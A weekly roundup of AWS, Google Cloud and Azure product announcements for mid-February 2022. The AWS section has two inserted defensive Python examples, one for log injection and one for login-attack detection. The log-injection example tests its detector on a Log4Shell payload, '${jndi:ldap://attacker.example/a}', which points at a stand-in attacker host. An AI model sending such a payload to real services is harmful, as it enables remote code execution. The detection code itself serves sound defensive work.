This week's roundup of all the cloud news.
Here's a cloud round up of all things GCP, Azure and AWS for the week ending Friday 18th February 2022
AWS Updates and Releases
Source: aws.amazon.com
Introducing auto-adjusting budgets
Starting this week, you can use AWS Budgets to create auto-adjusting budgets. An auto-adjusting budget dynamically sets your budget amount based on historical cost or usage over a time range that you specify. This reduces the guesswork in setting a budget limit and keeps you updated as your spend patterns change. Auto-adjusting budgets are generally available in all public AWS Regions.
With this launch, you can set a budget method based on fixed, planned or auto-adjusting limits. If you’re looking to catch spikes in cloud spend, use auto-adjusting budgets to receive alerts when your cost or usage patterns change as a complement to your existing budgets. At the beginning of each new period, AWS Budgets calculates your auto-adjusted budget amount using historical billing data within the specified time range.
Amazon RDS now supports Internet Protocol Version 6 (IPv6) on RDS Management APIs
Amazon Relational Database Service (Amazon RDS) now offers AWS customers the option to use Internet Protocol version 6 (IPv6) while accessing the RDS Management APIs. Customers moving to IPv6 can simplify their network stack by running their APIs on a network that supports both IPv4 and IPv6.
Amazon MQ is now available in Africa (Cape Town) Region
Amazon MQ is now available in a total of 25 regions, with the addition of the Africa (Cape Town) region.
Amazon MQ is a managed message broker service for Apache ActiveMQ and RabbitMQ that makes it easier to set up and operate message brokers on AWS. Amazon MQ reduces your operational responsibilities by managing the provisioning, setup, and maintenance of message brokers for you. Because Amazon MQ connects to your current applications with industry-standard APIs and protocols, you can more easily migrate to AWS without having to rewrite code.
Amazon CloudWatch Container Insights adds support for Amazon EKS on AWS Fargate using AWS Distro for OpenTelemetry
This week, Amazon CloudWatch Container Insights added metric collection support for your applications running on Amazon Elastic Kubernetes Service (EKS) with AWS Fargate using AWS Distro for OpenTelemetry (ADOT). ADOT is a secure, AWS-supported distribution of the OpenTelemetry project. Customers can now easily collect EKS Fargate metrics, such as CPU, memory, disk, and network, and analyze them along with other container metrics in Amazon CloudWatch. This helps customers observe the performance and resource utilization of their applications directly in the CloudWatch Container Insights console.
AWS introduces s2n-quic, a new open-source implementation of the QUIC protocol
AWS were pleased to announce the availability of s2n-quic, an open-source Rust implementation of the QUIC protocol, as part of the AWS encryption open-source libraries. AWS are also renaming s2n, AWS's open-source C implementation of the TLS protocol, to s2n-tls. s2n-quic has an API that is designed to be fast and small, with simplicity as a priority. Because it is written in Rust, it benefits from the language's performance and from its thread- and memory-safety guarantees. For the TLS 1.3 handshake, s2n-quic uses either s2n-tls or Rustls, an open-source Rust implementation of TLS.
Announcing Amazon Redshift Cross-region data sharing
Amazon Redshift data sharing lets you share live, transactionally consistent data across different Redshift clusters without the complexity and delays associated with data copies and data movement. Sharing data across clusters in the same AWS account and across accounts was already available; sharing data across Redshift clusters in different AWS Regions is now generally available. Cross-Region data sharing is supported on all Amazon Redshift RA3 node types.
Announcing Automatic Workload Management for Amazon Redshift Concurrency Scaling
Amazon Redshift now offers more efficient query processing for Redshift Concurrency Scaling clusters. Concurrency Scaling automatically adds and removes capacity to handle unpredictable demand from thousands of concurrent users.
Automatic Workload Management (AutoWLM) is designed to process queries more efficiently and is now enabled on Concurrency Scaling clusters.
AutoWLM uses machine learning to let Amazon Redshift predict and manage memory usage and query concurrency. Redshift clusters configured to use AutoWLM will now also use AutoWLM on their Concurrency Scaling clusters. You can monitor your Concurrency Scaling usage in the Amazon Redshift console.
AWS Resource Access Manager achieves PCI DSS Compliance
AWS Resource Access Manager (AWS RAM) is now a Payment Card Industry Data Security Standard (PCI DSS) compliant service. AWS RAM helps you securely share your AWS resources across AWS accounts or within your organization or organizational units (OUs) in AWS Organizations, or with AWS Identity and Access Management (IAM) roles and IAM users for supported resource types.
You can now use AWS RAM to share resources that may capture, transmit, and retrieve sensitive payment card data for use cases such as payment processing that are subject to PCI DSS.
Amazon Redshift announces support for unloading data to JSON files
Amazon Redshift adds support for unloading SQL query results to Amazon S3 in JSON format, a lightweight and widely used data format that supports schema definition. With the UNLOAD command in Amazon Redshift, you can now use JSON in addition to already supported delimited text, CSV, and Apache Parquet formats.
Using JSON format with your UNLOAD statement, you can write your query results to JSON files with each line containing a JSON object, representing a full record in the query result. Amazon Redshift supports writing nested JSON data when your query result contains columns using SUPER, the native Amazon Redshift data type to store semi-structured data or documents as values.
AWS Security Hub launches 13 controls and two partners for security posture monitoring
AWS Security Hub has released 13 new controls for its Foundational Security Best Practices (FSBP) standard to enhance customers' Cloud Security Posture Management (CSPM). These controls run fully automatic checks against security best practices for Amazon CloudFront, Amazon EC2, Amazon OpenSearch Service, Amazon Relational Database Service (RDS), Amazon Simple Storage Service (S3), and AWS Virtual Private Network (VPN).
If you have Security Hub set to automatically enable new controls and are already using AWS Foundational Security Best Practices, these controls are enabled by default. Security Hub now supports 175 security controls to automatically check your security posture in AWS.
AWS OpsWorks for Configuration Management now supports new version of Chef Automate
AWS OpsWorks for Configuration Management now supports the new version of Chef Automate for its managed service. Customers benefit from receiving the update automatically during the weekly system maintenance window scheduled individually by each customer.
AWS OpsWorks for Chef Automate now runs Chef Automate version 20220103112354 and Chef Infra Server version 14.11.36. These versions bring many improvements, bug fixes and security hardening, including protection from the Log4j vulnerability (Log4Shell, CVE-2021-44228). See Chef Automate's release notes for a complete overview of the changes and of backwards-incompatible changes, such as changes to the creation of teams and permissions.
Amazon CodeGuru Reviewer now detects Apache Log4j and other log injection vulnerabilities in code
Amazon CodeGuru is a developer tool powered by machine learning that provides intelligent recommendations to detect security vulnerabilities, improve code quality, and identify an application’s most expensive lines of code.
This week AWS announced a new log injection detector that analyzes your Java or Python code for potentially unsafe logging statements, including those that could be exploited through the Apache Log4j issue. The detector checks that your code prevents attackers from forging log entries, injecting malicious content into logs, or achieving remote code execution (RCE). When a log injection vulnerability is found, CodeGuru Reviewer provides an actionable recommendation, either in a repository analysis in the CodeGuru console or as a pull request comment.
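The forged-log-entry case such a detector looks for, shown here in Python as an added example (it is not CodeGuru's detector code and not code from the original page): an attacker-controlled username containing a CR/LF pair splits one log statement into two lines, and the second line imitates a genuine successful admin login. The hardened version escapes control characters so a value can only occupy one line, and a separate check flags the `${...}` lookup syntax that Log4Shell payloads rely on. The sample username, the `attacker.example` host and all helper names are constructed for this example.

```python
import io
import logging
import re

# Constructed attacker-controlled username. The CR/LF pair splits the log
# statement in two; the second half imitates a genuine successful admin login.
FORGED_USERNAME = "alice\r\n2022-02-18 10:00:01 INFO login succeeded user=admin"

# Log4j 2 lookup syntax; Log4Shell payloads used it with the jndi: prefix.
LOOKUP = re.compile(r"\$\{[^}]*\}")
# ASCII control characters, including CR, LF and ESC (terminal escape sequences).
CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def _logger_to_buffer(name):
    """Build a logger that writes to an in-memory buffer so output can be inspected."""
    buf = io.StringIO()
    logger = logging.getLogger(name)
    logger.handlers.clear()
    logger.propagate = False
    logger.setLevel(logging.INFO)
    handler = logging.StreamHandler(buf)
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    logger.addHandler(handler)
    return logger, buf


def log_login_unsafe(username, success):
    """Vulnerable: the raw username goes straight into the log record."""
    logger, buf = _logger_to_buffer("unsafe")
    logger.info("login %s user=%s", "succeeded" if success else "failed", username)
    return buf.getvalue()


def sanitize_for_log(value, max_len=128):
    """Escape control characters and cap the length, so one user-controlled
    value can only ever occupy one line of one log record."""
    value = str(value)[:max_len]
    return CONTROL.sub(lambda m: "\\x%02x" % ord(m.group()), value)


def log_login_safe(username, success):
    """Hardened: every user-controlled value is sanitized before logging."""
    logger, buf = _logger_to_buffer("safe")
    logger.info("login %s user=%s",
                "succeeded" if success else "failed", sanitize_for_log(username))
    return buf.getvalue()


def looks_like_lookup(value):
    """Flag strings carrying ${...} lookup syntax: the indicator worth alerting on
    when the log consumer is a Java service running Log4j 2."""
    return LOOKUP.search(str(value)) is not None


if __name__ == "__main__":
    print(repr(log_login_unsafe(FORGED_USERNAME, False)))  # two lines in the log
    print(repr(log_login_safe(FORGED_USERNAME, False)))    # one line, CR/LF escaped
    print(looks_like_lookup("${jndi:ldap://attacker.example/a}"))
```

Escaping rather than stripping keeps the evidence of the attempt in the log, which matters for incident response; the length cap also limits how much a single request can bloat the log. Python's logging module does not evaluate lookups, so `looks_like_lookup` is a detection aid for logs that a Java consumer may later process, not a fix for Log4j itself.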
CodeGuru Reviewer launches new Detector Library and example repositories
This week, AWS announced the new CodeGuru Reviewer Detector Library. The CodeGuru Reviewer Detector Library is a resource that contains detailed information about CodeGuru Reviewer’s security and code quality detectors. Each detection page within the Detector Library contains a description of the detector, non-compliant and compliant example code snippets, severity, and additional information that will help developers mitigate its risks (such as CWE numbers). This new resource will help AWS customers get a deeper understanding of the capabilities of CodeGuru Reviewer and can also be used as an educational resource to help customers improve the security posture of their applications.
Amazon Braket adds support for the new 80-qubit quantum processor from Rigetti
Amazon Braket, the quantum computing service from AWS, makes it easy for customers to conduct scientific research and software development with quantum computers. This week AWS announced that Amazon Braket has added support for the new 80-qubit superconducting gate-based quantum processor from Rigetti, named Aspen-M-1. With this launch, customers can use a multi-chip quantum processor architecture for the first time on Braket. With the new 80-qubit processor, customers can run quantum circuits with up to twice the qubit count supported by the previous-generation Rigetti device, enabling them to tackle larger problems.
AWS WAF Fraud Control - Account Takeover Prevention
AWS WAF announced the launch of AWS WAF Fraud Control - Account Takeover Prevention to protect your application’s login page against credential stuffing attacks, brute force attempts, and other anomalous login activities. Account Takeover Prevention enables you to proactively stop account takeover attempts at the network edge. With Account Takeover Prevention, you can prevent unauthorized access that may lead to fraudulent activities, or you can inform affected users so that they can take preventive action.
Account Takeover Prevention is offered through AWS Managed Rules. Once added to your AWS WAF web ACL, it compares usernames and passwords submitted to your application to credentials that have been compromised elsewhere on the web. It also monitors for anomalous login attempts coming from bad actors by correlating requests seen over time to detect and mitigate attacks like irregular login patterns, brute force attempts, and credential stuffing. Account Takeover Prevention is scoped down by default to act on your login page only. With optional JavaScript and iOS/Android SDK integrations, you can receive additional telemetry on devices that attempt to log in to your application to better protect your application against automated login attempts by bots. Account Takeover Prevention can also be used in conjunction with AWS WAF Bot Control and AWS Managed Rules to create a comprehensive defense layer against bots targeting your application.
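To make the request-correlation part concrete, here is an added Python example of the kind of logic such a rule group applies; it is written for this page and is not AWS's implementation. It classifies login sources as brute force (many failures against one username) or credential stuffing (many failures spread across many usernames) over a sliding time window, and checks submitted credentials against a local set of known-compromised credential hashes, then maps the result onto the two responses the text describes: block the request, or let it through and inform the user. The event sample, the IP addresses (RFC 5737 documentation ranges), the thresholds and the compromised-credential set are all constructed assumptions.

```python
import hashlib
from collections import defaultdict

# Constructed login events: (timestamp in seconds, source IP, username, success).
EVENTS = (
    # 12 failures against one account inside 33 seconds: brute force.
    [(t, "203.0.113.7", "alice", False) for t in range(0, 36, 3)]
    # 12 failures, each with a different username, inside 44 seconds: credential stuffing.
    + [(t, "198.51.100.9", "user%d" % i, False) for i, t in enumerate(range(0, 48, 4))]
    # A human mistyping once and then logging in: benign.
    + [(10, "192.0.2.5", "carol", False), (20, "192.0.2.5", "carol", True),
       (30, "192.0.2.5", "dave", True)]
)


def credential_hash(username, password):
    """SHA-256 of "username:password"; stands in for a breach-corpus lookup."""
    return hashlib.sha256(("%s:%s" % (username.lower(), password)).encode()).hexdigest()


# Constructed set of known-compromised credentials, kept hashed, never in clear.
COMPROMISED = {credential_hash("bob", "Winter2021!")}


def is_compromised(username, password, corpus=COMPROMISED):
    return credential_hash(username, password) in corpus


def classify_sources(events, window=60, max_failures=10, min_users=5):
    """Classify each source IP as "ok", "brute_force" or "credential_stuffing".

    A window of `window` seconds slides over each IP's attempts in time order; the
    first window holding at least `max_failures` failed logins decides the verdict,
    and the number of distinct usernames in it separates the two attack types.
    """
    by_ip = defaultdict(list)
    for ts, ip, user, ok in sorted(events):
        by_ip[ip].append((ts, user, ok))

    verdicts = {}
    for ip, attempts in by_ip.items():
        verdict = "ok"
        start = 0
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            failures = [a for a in attempts[start:end + 1] if not a[2]]
            if len(failures) >= max_failures:
                distinct_users = {a[1] for a in failures}
                verdict = ("credential_stuffing" if len(distinct_users) >= min_users
                           else "brute_force")
                break
        verdicts[ip] = verdict
    return verdicts


def decide(ip, username, password, history):
    """Edge decision for one login request: block, notify the user, or allow."""
    if classify_sources(history).get(ip, "ok") != "ok":
        return "block"
    if is_compromised(username, password):
        # The credentials may be valid but are known to be leaked: warn the user
        # or force a reset instead of silently allowing the login.
        return "notify_user"
    return "allow"


if __name__ == "__main__":
    for ip, verdict in classify_sources(EVENTS).items():
        print(ip, verdict)
    print(decide("192.0.2.5", "bob", "Winter2021!", EVENTS))
```

The thresholds need tuning per application (shared NAT egress addresses in particular produce many legitimate logins from one IP). The managed rule group compares against AWS's own compromised-credential data rather than a local set; if you build such a check yourself, use a hash-prefix (k-anonymity) lookup rather than sending plaintext credentials to an external service.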
Amazon Connect now provides CloudFormation support for integrations with third-party data
Amazon Connect now supports CloudFormation for its third-party data integrations service. Data integrations enable Amazon Connect customers to download data from third-party SaaS apps like CRMs, quality management, billing software, and order management solutions. You can now use AWS CloudFormation templates to help you deploy data integrations, along with the rest of your AWS infrastructure, in a secure, efficient, and repeatable way. For example, with data integrations, you can download knowledge articles from Salesforce via scheduled syncs and surface them in the Amazon Connect agent application as Wisdom articles, to help agents quickly resolve caller issues, while boosting their productivity.
Introducing Amazon EC2 C6a instances
Amazon Web Services (AWS) announces the general availability of compute optimized Amazon EC2 C6a instances. C6a instances are powered by 3rd generation AMD EPYC processors (code named Milan) with an all-core turbo frequency of up to 3.6 GHz, deliver up to 15% better compute price performance compared to C5a instances for a wide variety of workloads, and offer 10% lower cost than comparable x86-based EC2 instances. C6a instances are built on the AWS Nitro System, a combination of dedicated hardware and lightweight hypervisor, which delivers practically all of the compute and memory resources of the host hardware to your instances.
Amazon MQ now supports RabbitMQ version 3.9.13
Amazon MQ now provides support for RabbitMQ version 3.9.13. This update to RabbitMQ contains several fixes and enhancements compared to the previously supported version, RabbitMQ 3.8.26.
Announcing sub-millisecond read latencies for Amazon Elastic File System
Amazon Elastic File System (Amazon EFS) now supports sub-millisecond read latencies for all new and existing One Zone and Standard General Purpose file systems. Latency-sensitive applications such as content management systems, analytics, DevOps, and machine learning inference can now achieve read latencies as low as 600 microseconds on average.
AWS SSO Expands Support for Customer Compliance with PCI-DSS and IRAP
This week, AWS announced that AWS Single Sign-On (AWS SSO) has increased its alignment with customer compliance requirements for security and privacy. AWS SSO achieved Payment Card Industry – Data Security Standard (PCI DSS) compliance and is Information Security Registered Assessors Program (IRAP) assessed at the PROTECTED level. These are in addition to existing AWS SSO support for customer compliance with International Organization for Standardization (ISO), System and Organization Controls (SOC) 1, 2, and 3, Esquema Nacional de Seguridad (ENS) High, the Financial Market Supervisory Authority (FINMA) International Standard on Assurance Engagements (ISAE) 3000 Type 2 Report requirements, and Multi-Tier Cloud Security (MTCS). As a result, AWS customers have more opportunities to simplify multi-account access management and application authentication for environments that are subject to compliance standards.
Google Cloud Releases and Updates
Source: cloud.google.com
Node.js apps now support private dependencies hosted on an Artifact Registry Node.js package repository. To include private dependencies, list the Artifact Registry repository and configure settings for authenticating with the registry in your .npmrc file.
Python 3 apps now support private dependencies hosted on an Artifact Registry Python repository. To include private dependencies, add the Artifact Registry URL and the relevant packages in your requirements.txt file.
Artifact Registry
On-Demand Scanning for Go packages is now generally available.
You can scan your container images and identify Go package vulnerabilities.
BigQuery
Remote functions are now available in Preview. Remote functions let you implement a function in languages other than SQL and JavaScript, or with libraries or services that are not allowed in BigQuery user-defined functions.
The table clones feature in BigQuery is now in Preview. A table clone is a lightweight, writable copy of a table. You are only charged for storing the data in a table clone that differs from its base table.
The INFORMATION_SCHEMA.STREAMING_TIMELINE_* views are now generally available (GA).
The QUALIFY clause, which lets you filter the results of analytic functions in Google Standard SQL, is now generally available (GA).
BigQuery reliability guide is now available. This guide describes how to build solutions with BigQuery that meet your application's needs for availability, durability, consistency, and data recovery. Topics include the following:
- Import reliability - Managed storage, methods, load jobs, and the Storage Write API
- Query reliability - Slots, reservations, and job optimization.
- Read reliability - Read methods, consistency concerns including quotas and limits, and the Storage Read API.
- Disaster planning - Disaster considerations and their mitigation.
Cloud Build
Support for configuring triggers to use a particular service account is now generally available. To learn more, see Configuring user-specified service accounts.
Cloud CDN
Dynamic compression allows Cloud CDN to automatically compress responses as they are being served between the origin and the client. The size of the data sent over the network is reduced by 60% to 85% in typical cases. This feature is supported in Preview.
Cloud Functions
Cloud Functions has added support for low-configuration access to private dependencies on Artifact Registry in Node.js and Python.
Cloud Functions has released Cloud Functions (2nd gen), available at the Preview release level. Cloud Functions (2nd gen) is Google Cloud's next-generation Functions-as-a-Service offering. This new version of Cloud Functions comes with an advanced feature set, giving you more powerful infrastructure, advanced control over performance and scalability, more control around the functions runtime, and triggers from over 90 event sources.
See the Cloud Functions (2nd gen) documentation for details.
Cloud Key Management Service
Virtru is now available as a supported Cloud EKM partner. See Supported key managers to learn more.
Cloud Load Balancing
Internal TCP/UDP Load Balancing now supports source-IP address session affinity (CLIENT_IP_NO_DESTINATION) in Public Preview.
Cloud Logging
You can now configure default storage regions and disabled _Default sinks for your Google Cloud organizations and all of their new projects and folders. For details, see Configure default resource settings for Logging.
You can now collect Apache Solr metrics and logs from the Ops Agent, starting with version 2.10.0. For more information, see Monitoring third-party applications: Solr.
You can now collect Apache Kafka metrics and logs from the Ops Agent, starting with version 2.10.0. For more information, see Monitoring third-party applications: Kafka.
You can now collect MongoDB logs from the Ops Agent, starting with version 2.10.0. For more information, see Collect logs from third-party applications: MongoDB.
Cloud Monitoring
You can now configure how missing data is treated in alerting policies. Currently, if data stops arriving, the alerting policy repeats the previous measurement, so open incidents stay open. You can now treat missing data as violating the condition so an active condition stays active, or treat it as non-violating so that an active condition closes. For more information, see Partial metric data.
You can now collect Apache Solr metrics and logs from the Ops Agent, starting with version 2.10.0. For more information, see Monitoring third-party applications: Solr.
You can now collect Apache Kafka metrics and logs from the Ops Agent, starting with version 2.10.0. For more information, see Monitoring third-party applications: Kafka.
You can now collect Apache CouchDB metrics from the Ops Agent, starting with version 2.10.0. For more information, see Monitoring third-party applications: CouchDB.
You can now collect Apache ZooKeeper metrics from the Ops Agent, starting with version 2.10.0. For more information, see Monitoring third-party applications: ZooKeeper.
You can now collect Elasticsearch metrics from the Ops Agent, starting with version 2.10.0. For more information, see Monitoring third-party applications: Elasticsearch.
Cloud NAT
Dynamic port allocation for Cloud NAT is available in General Availability.
Cloud SQL for MySQL
Cloud SQL now supports the use of tags on instances. Tags are key-value pairs you can apply to your resources, such as a project or a Cloud SQL instance, which are used for fine-grained access control. To learn more, see Access control with Google Cloud tags. To use tags now, see Attach and manage tags on Cloud SQL instances.
Cloud SQL for PostgreSQL
Cloud SQL now supports the use of tags on instances. Tags are key-value pairs you can apply to your resources, such as a project or a Cloud SQL instance, which are used for fine-grained access control. To learn more, see Access control with Google Cloud tags. To use tags now, see Attach and manage tags on Cloud SQL instances.
Cloud SQL for SQL Server
Cloud SQL now supports the use of tags on instances. Tags are key-value pairs you can apply to your resources, such as a project or a Cloud SQL instance, which are used for fine-grained access control. To learn more, see Access control with Google Cloud tags. To use tags now, see Attach and manage tags on Cloud SQL instances.
Data Catalog
Data Catalog now supports cataloguing and searching data entries from Dataplex lakes, zones, tables, and filesets. For more information, see the Dataplex documentation and Data Catalog documentation.
Dataflow
Profiling Dataflow pipelines with Cloud Profiler is generally available (GA). Use Dataflow integration with Cloud Profiler to monitor pipeline performance.
Dataplex
Dataplex is generally available (GA). Dataplex is an intelligent data fabric that helps organizations to centrally manage, monitor, and govern their data across data lakes, data warehouses, and data marts with consistent controls, providing access to trusted data and powering analytics at scale.
Dataproc
A script that checks if a project or organization is using an unsupported Dataproc image is available for downloading (see Unsupported Dataproc versions).
Memorystore for Redis
Added support for enabling read replicas (preview) on existing instances. For more information, see Behavior of enabling read replicas on an existing instance. Also added the capability to perform version upgrade and manual failover operations on instances that use read replicas.
Service Directory
Service Directory integration with Traffic Director is available in Preview.
After you register a service with Service Directory, the integration makes services in the service registry available to the applications in your mesh and to gateways configured by Traffic Director. Your service mesh and self-managed gateways can then send traffic to these services.
Traffic Director
Traffic Director is now integrated with Service Directory. After you register a service with Service Directory, the integration makes services in the service registry available to the applications in your mesh and to gateways configured by Traffic Director. Your service mesh and self-managed gateways can then send traffic to these services.
Vertex AI
You can now use a pre-built container to perform custom training with TensorFlow 2.8.
Microsoft Azure Releases And Updates
Source: azure.microsoft.com
Public preview: Resource configuration changes
Resource configuration changes, a feature that lets you query changes to Azure resource configurations across subscriptions, management groups, and the tenant, is now in public preview.
Public preview: Cross region virtual machine restore points
Create restore points in any region and copy restore points from one region to another.
General availability: Automatically delete a VM and its associated resources simultaneously
You can now automatically delete disks, NICs, and Public IPs associated with a VM at the same time you delete the VM.
In development: Price sheet download as a zip file
Price sheet download experience update for using Azure in a small business environment.
Generally available: New learning content on the Azure IoT Central homepage
The Azure IoT Central homepage has been refreshed with new learning content to help you start your IoT solution development.
Public preview: Azure Machine Learning February 2022 announcements
New features now available in public preview include automatic time series ID detection for automated ML, training code generation for automated ML models, and moving Azure Machine Learning workspaces between subscriptions.
Generally available: Azure Database for PostgreSQL – Hyperscale (Citus) new certifications
New compliance certifications are now available on Azure Database for PostgreSQL – Hyperscale (Citus), a managed service running the open-source Postgres database on Azure.
General availability: Azure Database for PostgreSQL – Hyperscale (Citus) additional regions available
Azure Database for PostgreSQL – Hyperscale (Citus) is now available in the Central US, South Central US, West Central US, and West US regions to distribute your Postgres database.
Generally available: Virtual Machine level disk bursting supports additional VM types
Handle unforeseen disk traffic spikes smoothly without the need to overprovision your virtual machine with virtual machine level disk bursting.
Public preview: Azure Tables extension for Azure Functions
Azure Functions has an updated Tables extension, now shipped in its own NuGet package.
General availability: Developer portal widget for embedding custom HTML code
Use custom HTML code widget to extend developer portal's functionality.
Generally available: Alert processing rules in Azure Monitor
Alert processing rules (formerly action rules) provide post-processing capabilities for fired alerts in Azure Monitor.
Public preview: App Service Environment v3 Migration Feature
Migration guidance allows you to move to App Service Environment v3 and take advantage of refreshed infrastructure, better performance, and the removal of the stamp fee found on older versions.
Public preview: Azure Monitor predictive autoscale for Azure virtual machine scale sets
Predictive autoscale for Azure virtual machine scale sets can manage and scale your virtual machine scale sets by observing and learning from historical CPU usage patterns.
Generally available: Hotpatch for Windows Server virtual machines
Hotpatch (reboot-less update) is now in general availability for Windows Server virtual machines as part of Azure Automanage for Windows Server.
Public preview: Kubernetes v1.23 support in AKS
Take advantage of new features in Kubernetes v1.23.
Now available: CIS benchmarks for Kubernetes
AKS now meets CIS benchmark standards for Kubernetes.
General availability: Azure tags support in AKS
You can now specify Azure tags when creating or updating an AKS cluster to track resource usage.
General availability: Azure Sphere version 22.02 expected on Feb 28, 2022
Participate in the retail evaluation now to ensure full compatibility. The OS evaluation period for 22.02 provides 14 days for backward compatibility testing.
Public preview: OCR supports 164 languages in the Cognitive Services Computer Vision
Computer Vision Read API for Optical Character Recognition (OCR), part of Cognitive Services, announces its public preview with support for new languages including Arabic, Hindi, and other regional languages with the same writing scripts. It also extends handwritten OCR support for Japanese and Korean, along with enhancements for handwritten dates, names, and amounts and general performance and AI quality enhancements.
Have you tried Hava automated diagrams for AWS, Azure and GCP. Get back your precious time and sanity and rid yourself of manual drag and drop diagram builders forever.
Hava automatically generates accurate fully interactive cloud infrastructure and security diagrams when connected to your AWS, Azure or GCP accounts. Once diagrams are created, they are kept up to date, hands free.
When changes are detected, new diagrams are auto-generated and the superseded documentation is moved to a version history. Older diagrams are also interactive, so can be opened and individual resources inspected interactively, just like the live diagrams.